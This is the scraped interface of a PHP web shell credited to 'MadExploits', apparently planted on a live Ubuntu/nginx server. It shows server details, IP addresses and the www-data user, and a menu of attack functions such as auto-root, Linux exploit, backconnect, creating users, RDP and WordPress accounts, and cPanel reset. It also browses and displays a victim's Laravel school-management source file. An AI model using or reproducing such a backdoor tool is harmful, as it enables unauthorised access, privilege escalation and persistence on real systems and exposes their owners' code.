Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core /
app /
Modules /
Academic /
DTO /
[ HOME SHELL ]
Name
Size
Permission
Action
AcademicAffiliationDTO.php
1.6
KB
-rw-rw-r--
AcademicInformationDTO.php
2.6
KB
-rw-rw-r--
AcademicProgramBatchDTO.php
1.67
KB
-rw-rw-r--
AcademicProgramDTO.php
1.76
KB
-rw-rw-r--
AttendanceDTO.php
2.81
KB
-rw-rw-r--
BatchSessionDTO.php
1.96
KB
-rw-rw-r--
ClassSectionDTO.php
1.25
KB
-rw-rw-r--
MasterClassDTO.php
1.44
KB
-rw-rw-r--
MasterClassSectionDTO.php
1.59
KB
-rw-rw-r--
MasterSubjectDTO.php
1.46
KB
-rw-rw-r--
SectionSubjectDTO.php
1.55
KB
-rw-rw-r--
SessionClassDTO.php
1.35
KB
-rw-rw-r--
SubjectTeacherDTO.php
1.42
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BatchSessionDTO.php
<?php namespace App\Modules\Academic\DTO; use Spatie\DataTransferObject\DataTransferObject; class BatchSessionDTO extends DataTransferObject { public int $id; public int $batch_id; public string $name; public ?string $name_alias = null; public string $start_date_ad; public string $end_date_ad; public string $start_date_bs; public string $end_date_bs; public ?string $remarks = null; public int $is_active; public int $is_current; public ?object $created_by_json = null; public ?object $updated_by_json = null; public AcademicProgramBatchDTO $academic_program_batch; /** * @param batches_session[] $data * @return BatchSessionDTO */ public static function collection($data) { return $data->map(function($item, $key) { return self::toJsonResponse($item); }); } /** * Transform the resource into an array. * * @param batches_session{} $params * @return array */ public static function toJsonResponse($params) { return new self([ 'id' => $params->id, 'batch_id' => $params->batch_id, 'name' => $params->name, 'name_alias' => $params->name_alias, 'start_date_ad' => $params->start_date_ad, 'end_date_ad' => $params->end_date_ad, 'start_date_bs' => $params->start_date_bs, 'end_date_bs' => $params->end_date_bs, 'remarks' => $params->remarks, 'is_active' => $params->is_active, 'is_current' => $params->is_current, 'created_by_json' => json_decode($params->created_by_json), 'updated_by_json' => json_decode($params->updated_by_json), 'academic_program_batch' => AcademicProgramBatchDTO::toJsonResponse($params->academic_program_batch), // 'created_at' => $params->created_at, // 'updated_at' => $params->updated_at, ]); } }
Close